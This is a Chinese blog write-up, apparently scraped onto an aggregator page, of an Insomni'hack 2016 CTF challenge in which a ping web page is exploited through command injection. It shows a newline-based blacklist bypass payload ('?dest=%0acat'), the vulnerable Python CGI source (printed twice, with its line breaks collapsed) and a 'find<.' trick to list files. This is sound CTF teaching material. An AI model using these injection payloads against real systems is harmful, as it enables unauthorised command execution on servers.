当前位置:Gxlcms > html代码 > InsomniHack2016CTFteaser–BringthenoiseCrypto200WriteUp_html/css_WEB-ITnose

InsomniHack2016CTFteaser–BringthenoiseCrypto200WriteUp_html/css_WEB-ITnose

时间:2021-07-01 10:21:17 帮助过:66人阅读

帮小伙伴解个题,想起博客很久没更新了,顺便写上来。

给了个网址,提示说按照正常思维去拿flag.......(瞬间吐槽2333333玩这个谁会自己按照正常思维啊...)

给出网页可以允许ping其他主机并显示结果。

这个阶段的话就相当于随便猜了,八九不离十是远程代码执行。然后开始常见注入测试,但是发现大部分都被过滤了。

还好换行符没被ban,unix中还能用作分隔符。

果然可以列出当前目录....然后就开始吐槽制作方的无脑.....(等下你就知道了)

然后发现这个页面同时支持GET/POST请求,写了个注入语句读取一下这个cgi的内容:

?dest=%0acat

Python

#!/usr/bin/env python import cgi, subprocess, os headers = ["mod_cassette_is_back/0.1","format-me-i-im-famous","dirbuster.will.not.help.you","solve_me_already"] print "X-Powered-By: %s" % headers[os.getpid()%4]print "Content-type: text/html"print print """ Can I haz Smart Cat ??? 

Smart Cat debugging interface

""" blacklist = " $;&|({`\t"results = ""form = cgi.FieldStorage()dest = form.getvalue("dest", "127.0.0.1")for badchar in blacklist:if badchar in dest:results = "Bad character %s in dest" % badcharbreak if "%n" in dest:results = "Segmentation fault" if not results:try:results = subprocess.check_output("ping -c 1 "+dest, shell=True)except:results = "Error running " + "ping -c 1 "+dest print """ Ping results:
%s
""" % cgi.escape(results)
#!/usr/bin/env python import cgi, subprocess, os headers = ["mod_cassette_is_back/0.1","format-me-i-im-famous","dirbuster.will.not.help.you","solve_me_already"] print "X-Powered-By: %s" % headers[os.getpid()%4]print "Content-type: text/html"print print """ Can I haz Smart Cat ??? 

Smart Cat debugging interface

""" blacklist = " $;&|({`\t"results = ""form = cgi.FieldStorage()dest = form.getvalue("dest", "127.0.0.1")for badcharin blacklist:if badcharin dest:results = "Bad character %s in dest" % badcharbreak if "%n" in dest:results = "Segmentation fault" if not results:try:results = subprocess.check_output("ping -c 1 "+dest, shell=True)except:results = "Error running " + "ping -c 1 "+dest print """ Ping results:
%s
""" % cgi.escape(results)

好吧原来是个python脚本....

然后发现了不能ls -R的原因,因为TAB和空格被过滤了....

不过又没人说不能用别的办法啊,于是想到某个forum里的大神提到的新方法: find<.

制作商你满满的心机啊.......诅咒你....

然后复制粘贴,拿到flag文件,尼玛为毛是个猫.......233333333333还有这个flag是什么鬼啊

人气教程排行